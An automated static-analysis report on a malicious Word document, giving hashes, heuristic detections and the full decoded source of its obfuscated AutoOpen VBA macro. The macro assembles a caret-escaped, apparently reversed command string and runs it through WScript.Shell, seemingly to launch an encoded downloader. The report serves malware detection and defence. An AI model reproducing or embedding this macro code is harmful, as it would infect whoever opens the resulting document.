Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2416204d20ab401b…

MALICIOUS

Office (OLE)

85.9 KB Created: 2018-08-23 06:15:00 Authoring application: Microsoft Office Word First seen: 2018-08-26
MD5: 87b77cba5f5f727fd4680636d6571563 SHA-1: 5b0fa8ecbe130db5753105b2004d4091e14b7b6e SHA-256: 2416204d20ab401b02be26fd5c85852c220dc243a85eccc85fbec37489caed99
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and CreateObject, indicating an attempt to execute arbitrary commands. The presence of an AutoOpen macro suggests automatic execution upon opening the document. The primary function of the script appears to be downloading and executing a second-stage payload, as evidenced by the critical heuristic firings for Shell() and WScript.Shell usage.

Heuristics 10

  • ClamAV: Doc.Malware.Ddma-6691546-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ddma-6691546-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10174 bytes
SHA-256: 2f462063740cc6f749ffe21d76caa565ee21399bab85482d9904aef7e8fe8ec7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
142 of 227 identifiers look randomly generated (e.g. 'ndsCifZXXbKzbi'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hVjmXUfjsT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TlGDwozEkCdrB"
Function YJzAntBCW()
On Error Resume Next
Error jZQhW / 6012 / 75010 * TSBRw
   Error TDOUc / sFalDk
   Error 86899 * hbpawV
UGUXAz = "MD /v^" + ":^" + "  ^ ^  " + " /r  " + " " + CStr(Chr(GcqwpJaKI + ndsCifZXXbKzbi + 34 + VpFFiKWwmlETb + pMnPirYnG)) + "  ^" + "s^Et" + " " + "P^" + "d=^="
Error 93843 * hsjdkz
rTJjc = "=^A" + "^A" + "gAAIA^" + "A" + "C^A^gA" + "AI" + "AACA" + "^gAA^I^" + "AAC^"
Error wZMYZw * zYFtQd * 59388 * niiiO
   Error GjwTL * SlisVr
   Error 95089 / DOuNI * 1460 * vQJOz
XqncitJXktd = "A^g^AAI" + "^AAC" + "Ag^" + "AAI" + "A^AC^" + "Ag" + "^A^AI^A" + "^0" + "^H^A^9B" + "^w^e" + "AgG"
Error 96959 / hrOnNj * vVbZD * 24619
   Error 50352 * lJKqa
   Error 6883 * wVlRkC / 83251 / Clwqz
jsfBvXPvORl = "Aj^" + "B" + "^A^d^AE" + "^" + "G" + "^AjB^" + "Qf^" + "AsD^ArB" + "Q^Y^A"
Error 76623 * DSYCU * QWCUw / czjGHU
   Error OcOsj / pnHPc * 25901 / MKEWwk
qDQQicdr = "^U^GA^y" + "B^gY" + "AsD^AzB" + "^gY^A" + "^0E^" + "A^" + "k" + "^A^AI"
YJzAntBCW = UGUXAz + rTJjc + XqncitJXktd + jsfBvXPvORl + qDQQicdr
   Error LZwLE / pomcFS
   Error vTdsU / 44546 / MIRBjN * QqQsN
   Error zHzFJR / jOhTi
End Function
Function hqNLz()
On Error Resume Next
Error 34002 / ndMoLK / TMrsmA * ZPVCjf
   Error 62940 * QbvYVo
   Error dbhDul / hEZDzQ * 46507 / aVmUk
fvnQDbpw = "^A0^G^A" + "l" + "^BA" + "dA" + "^"
Error 55856 / KJAXB * 77114 * PiWIAm
   Error zuQbwM * tHHNJm
VrKcfjhd = "k" + "EA^t^" + "A" + "Q^Z^" + "A^s^GA" + "vB" + "gdA^" + "4^" + "GAJ" + "B^w^"
Error 75202 * jPuujf / jwlim * mErmYW
SoswLiMPfIT = "OAkCA" + "zB^gY^" + "A^" + "0E" + "Ak" + "AAI^A^" + "w"
Error 66932 * bduoC
   Error 84803 * zBzbE * 54251 * uVaWD
pazpalz = "CA" + "vBg^eAw" + "^GAk" + "AA" + "^KAU^" + "GA^s" + "^B^Q"
Error ZrjKMH * YBwzi * WdWCAM * fMCnl
   Error WGYSV * ISQHit / 52776 * 14239
   Error jIJRz / HopGiY * rzTGG / pLLpn
   Error 55687 * kEIznP * KrGvtm / CHsqJ
pjkfSickd = "aAYEA" + "k^BQY^A" + "8^G" + "A" + "^sB"
Error 57359 / shDNPX * 12216 * NzWwUM
   Error 38468 / RPcti
   Error aOFRX / PNZpj
   Error 7208 / YQjMo / pbHJN * sZcEuS
YFQHjOwTCdV = "g^" + "b^AcH^A" + "v" + "^B" + "AR" + "^A^4C^A" + "YBg" + "^" + "d^Ac" + "HAk^Aw"
Error 23376 / kkBNB
   Error iwmAS / NAhJYi / loLrit * onPjp
   Error 17587 * bOzYFX / 458 / MYSudt
   Error 98075 / ljqtM * 81682 / 82083
homHA = "e" + "^AkH" + "Ay^B" + "^A^dA" + "s^HA^p^" + "AA"
hqNLz = fvnQDbpw + VrKcfjhd + SoswLiMPfIT + pazpalz + pjkfSickd + YFQHjOwTCdV + homHA
   Error YTKzZJ * HwSLza
   Error iSvNl / CEPRYC
   Error 34466 * fXvZJj * 14523 * UviCLY
End Function
Function ZNJizjw()
On Error Resume Next
Error 18655 * uOCUL * SUWmn * qYIGYm
HtrBuYTCi = "^a^As^" + "EA^" + "M^B^A^J" + "^A^ACAu" + "^B^Q^a" + "^A^AC^" + "Av^Bg^e" + "Aw^" + "GAkAA" + "KA^g^G"
Error awLAa * zDbOqI / dSzZz / VTwzbj
   Error GimlH * jwpok
   Error 38241 / ivzEZj
   Error 30226 / tiWOu / AGjJoF / 32748
MLipMAnz = "Aj^B" + "Q" + "Y^AU" + "GAy^Bw" + "bA^YG^A" + "7A^wJ^A"
Error 77883 * PbpDz
   Error knsSW / ZJfWqE * isAFG / 44037
   Error 22232 / HiPDc * kQGbtZ * dikifc
ZKwlJC = "U^G" + "^A^4^B^" + "Q" + "Z^A^4" + "CAnA" + "wK^A" + "o^F^A^H" + "B^"
Error 2153 / lCbwSn / YCMGV * BGSzJb
SsOMwEnPTF = "QbA^QC^" + "Ar^AwJ" + "Aw^F" + "^An" + "^A^wK^A" + "M" + "GA^pB" + "A"
Error 74994 / 400 * GYwMib * Kmmvvq
   Error VRznr / NFwwn
   Error 23308 * 27080
   Error EUZWbj / aBUjrG * 31569 * 90074
lwTSrkwt = "bA^IG" + "A1" + "B^Ac^A" + "^o^D" + "^A^" + "2B" + "^g^b" + "^A^"
Error FlMzM / MQclJ
hSrwnJzQ = "UGA^kA^" + "Q^P^A^" + "M^H^A" + "i^B" + "^QTA" + "QC" + "A7^A" + "wJ^AkD" + "^A3^AQ" + "NA" + "c"
Error habJC * PDJIN / 51104 / lzMjk
   Error ZUjBr / XkNszw / mfjlGZ / uwjzXd
   Error 12064 * EFSnGJ / 16736 * 75003
UwSrHN = "CA^g^" + "AQ^P" + "^A" + "^AC^A^" + "a^B" + "^wR^"
Error SNkfp * LPjQF
   Error ZKQXao * dNmqvU
   Error 77957 / dYtDmM
PBvZzSq = "A^0G^" + "Ak^A^w^" + "O" + "A^" + "kC^A" + "n^A" + "^AQ^" + "Ac" + "C^Ao"
Error EaujVB / LvQmfO * wZHRZv / TwPZB
   Error nzTmL / MrPJPm / unbWS * NcjMX
tjdof = "^A^A" + "^d" + "^A^k^G^" + "A^s" + "B^Ac" + "^A" + "M^F"
Error 43531 / qDSPDY / wQZlbi / Uqbjo
   Error EzCMbb * LvZUca * zsuYis * 95308
   Error HnvbPj * zjnNAw
cJFBDUbcWA = "A^uAw" + "^JA^Y^" + "F^A^0" + "^Agc^A^" + "U^GA" + "K^BQM^" + "AkD^A" + "v^A" + "^A^d^A" + "U^GA^"
Error QzEbX / jLFkst / 17370 * CJFLp
   Error Kiczs * rwlcKq / hKOuuY * BEIFsv
   Error 95382 * SVSWY / KtwlE * DbzQm
VHwJfWSzU = "u^B^g" + "LAc^GA^" + "u" + "^BQa" + "^A^" + "s^G^" + "A^jB" + "Q" + "YA^g^" + "G^" + "Au^B" + "^" + "gc^"
Error 19858 / aWFwT / dtXNsA * tmQPEC
   Error 69467 * XocmH
   Error rEzzo / QbdfU / PUIhDT / suKRQ
EPdqImLuY = "AEG" + "A" + "lB" + "^" + "AbA^4" + "CA" + "^kB^A^" + "Z^A^"
Error pIRnl * nGcQF
   Error 39829 * SwzHt * MiXWZ * QTjjFM
   Error bWcChs * CDBJOC
   Error hRiwqF * jBwla
NwbzWw = "8^GAv^" + "AwL^AoD" + "A^" + "w^B^A^" + "d^A^" + "Q" + "HAo^" + "B^AQ^A^" + "gD^A3A^" + "wQA" + "^U^H^" + "A^GB" + "AeA8C^A"
ZNJizjw = HtrBuYTCi + MLipMAnz + ZKwlJC + SsOMwEnPTF + lwTSrkwt + hSrwnJzQ + UwSrHN + PBvZzSq + tjdof + cJFBDUbcWA + VHwJfWSzU + EPdqImLuY + NwbzWw
   Error 72455 * LNkPG
   Error MKwnK / boZzKo / 31181 / lckQi
   Error 40897 * MOuNVL
   Error 39107 * jNCoj / 92125 * wZBVJ
End Function
Function MFUYYiizJu()
On Error Resume Next
Error Qzisw / Qwohz / 51624 / kfSPLF
   Error 9490 * nrnEdv / 60951 / LzRFa
TzEwlON = "t^B^wb" + "A^MGA" + "u" + "A^QZAAH" + "^" + "AvBAa^"
Error 17374 * kziBz / 89377 / Klcjz
Znnwhu = "AsGA" + "^y^" + "B^Q^aA" + "^sGAtB^" + "Q^aAQ^H" + "^A^u^" + "AAd" + "A^M" + "^HA^lB" + "Ad" + "^A^8CA"
Error zkXrnD / fiJkFi * SUQSRQ * 89366
   Error IHWvzX / UzjfiC * UiXHpz * OTQCTW
cbckqEMd = "vA^g^O^" + "A" + "A" + "H" + "^A0^BAd" + "^A^g^GA" + "ABwZAk" + "^DApB^"
Error ditnG / 86234 / AQWCwI * PqXCoz
inistzWwkic = "w^T^AYG" + "A1A" + "^" + "wL" + "^A^0^G" + "^AvB^wY" + "^A4CAp" + "B^w^Y" + "AcGA" + "^hBAZ" + "^A^I"
Error JJYpd * pIfTMd
   Error jBwmB * zDlsF
wlriSO = "H" + "A" + "^1B^" + "wZ^A" + "^o" + "H" + "Av^B^g^" + "L" + "A8G"
Error izTUC * AhjIw
   Error MPzrc / vXOizp
   Error rWvNlT / mKGdu / SQGCY / 20082
NrqPOuZka = "As" + "^" + "B^Q^a^" + "A^YGA" + "^j^B^" + "Q" + "^YA" + "^I^H^" + "A^h"
Error 28760 / JFstj / 25735 * btiNN
mIvCiYWr = "^Bw^LA" + "8CA^6A" + "^AcAQH" + "A^0" + "^B" + "^A" + "^a^" + "AA^E" + "A" + "3" + "^"
Error PQTihQ * 71606 / aDGlX * rVzuYi
   Error 75912 / UZFjNE / 95359 / TIqzG
   Error 96305 * PPGBJL / 90877 / 48608
FasSU = "B^" + "w^LAw^G" + "A^w^B^g" + "L^A^Q" + "^G^" + "A" + "^0A^Q^" + "YA^" + "U^GA" + "nBwbA^" + "I" + "^"
Error wclAu / isHJn / 26751 * 2001
ZVDQADkIEK = "H^Aw^B^" + "w^L" + "^A^8C" + "A6^A^Ac" + "^AQ^H" + "^A^" + "0B^A" + "aAA^E" + "A^h^" + "B" + "^g" + "YA^8C" + "AtBw^b^"
Error 55605 / 87463 / 74667 / hBkOjs
   Error 11343 / nqvuNb / RjISG / UbIIZ
   Error 46063 * fzFbhY
oiLcvjkqDV = "A^M^G" + "Au^A^w" + "c^AcGA^" + "uB^" + "Qa" + "AY^HAh" + "^B^wcAk" + "HAn^Bg" + "cAUGAuB" + "Q^" + "ZA" + "^w" + "G^"
Error Zwrpp * LOFUz
   Error UVOjJF / TLBJPp * 17384 / CVisFA
   Error 17880 * fmEzLK / YiQRjw * PTEpOv
   Error 42955 * BmCKG / 48002 * 48358
koWcEpGzJF = "AhB" + "^wY^" + "A4G" + "A" + "^y" + "^BQ^Z" + "^A^g^G" + "A^0^B" + "^QdA8^G" + "A^z^BwL" + "A^8C^" + "A^6"
Error MnAWAc * BSllY / 83525 * GuOYA
   Error 30 / TLkqFo
zwPShswRRrj = "AAc^AQ" + "^" + "HA0^B" + "AaAc" + "CA^9" + "^" + "A^Aa^A" + "^s" + "^EA^M" + "B^A^J" + "A^s"
MFUYYiizJu = TzEwlON + Znnwhu + cbckqEMd + inistzWwkic + wlriSO + NrqPOuZka + mIvCiYWr + FasSU + ZVDQADkIEK + oiLcvjkqDV + koWcEpGzJF + zwPShswRRrj
   Error TbhMcw / bDIFpb
   Error Ywwuuk * wIbZSv * CqzVWF / iRlzS
   Error 27099 / GmKizZ * 85956 * pjpUI
End Function
Function ZOkwWAJDMS()
On Error Resume Next
Error 41038 / kQlCIq * NfIcc / kDdrj
Hvmfd = "^D^A^0B" + "^gbAU^G" + "^A^" + "pBAbA^M" + "^" + "E^" + "Ai^B^QZ" + "^A" + "c^F" + "A^uA^" + "A^d"
Error IhsjLU / 69250
   Error cwEjh * bbGCm
   Error UFbNu / NzbZjd
hmalo = "A" + "^UG^A^O" + "^B" + "AIAQ" + "H^AjBQ^" + "Z^AoG" + "^A^i^B" + "w^" + "bA^0C^"
Error iwtnnY * aREOkT * YZJdm / 7029
   Error 23905 / FXXMVN / iNfvsi / ivSXKW
   Error rzQpAf / Awdabc / 96007 * DUCMT
   Error 18700 / QDitz * 21662 * uvwApw
   Error 18349 * 79432
   Error 31757 / jRwXv / 61058 / mEtLQT
TzqmfbVD = "A3B^QZ" + "A4" + "G" + "A^9" + "AAW^AY"
Error 69776 / DXKQww / 71697 / 80320
   Error udSKrH * Edzlhf * 23231 * DVZRK
ohjCdqal = "HA^" + "3^B" + "^AJ " + "e^" + "- ^l" + "^le^h^s" + "r^e^" + "wop&& " + " " + " ^f^" + "O"
Error zFXIj / cwsaOZ / 35151 * nQSjZS
   Error sHlcp / WARaup
   Error owZqR * jPmjr
   Error ciCDzX * 39098 * 51231 * vzzCj
NDFYhzVlMI = "r /^L " + "%^o ^" + "iN ( 9" + "^9^7" + "^ ^-1 ^"
Error AcsjJP * KKfvO / OPQXN * HOQWt
   Error WNArT / 44053
zwpajZisYCw = "0)  d^" + "o " + "   ^s" + "^et" + " " + "  ^pR" + "^U" + "D" + "=" + "!" + "^pR^" + "UD!!"
Error vfsJZ / vNwaO * BuVOmd * BIzjT
zuNPKshjm = "P^d:~ " + "   %^" + "o, 1!" + "&&i^F %" + "^o   ^L" + "E^" + "Q ^0 " + " C^A^L"
Error mrtzw * DDHfd / 83224 * qOoQqw
   Error QkFwY / NdfRW / sOATq / jzNtC
XiBsQwsiEhA = "l  " + "%" + "^pR^UD" + ":^~^ ^" + "-^9^9^8" + "% " + "  " + CStr(Chr(JqwdOPQREVCzO + uPzaGvaJ + 34 + oTuAwCziuAfBJ + DKswnOYmYzJpf)) + "    "
ZOkwWAJDMS = Hvmfd + hmalo + TzqmfbVD + ohjCdqal + NDFYhzVlMI + zwpajZisYCw + zuNPKshjm + XiBsQwsiEhA
   Error 63979 / HisKWW
End Function


Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
   Error EYHSt * oNCwD / 50375 * TGfFQW
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.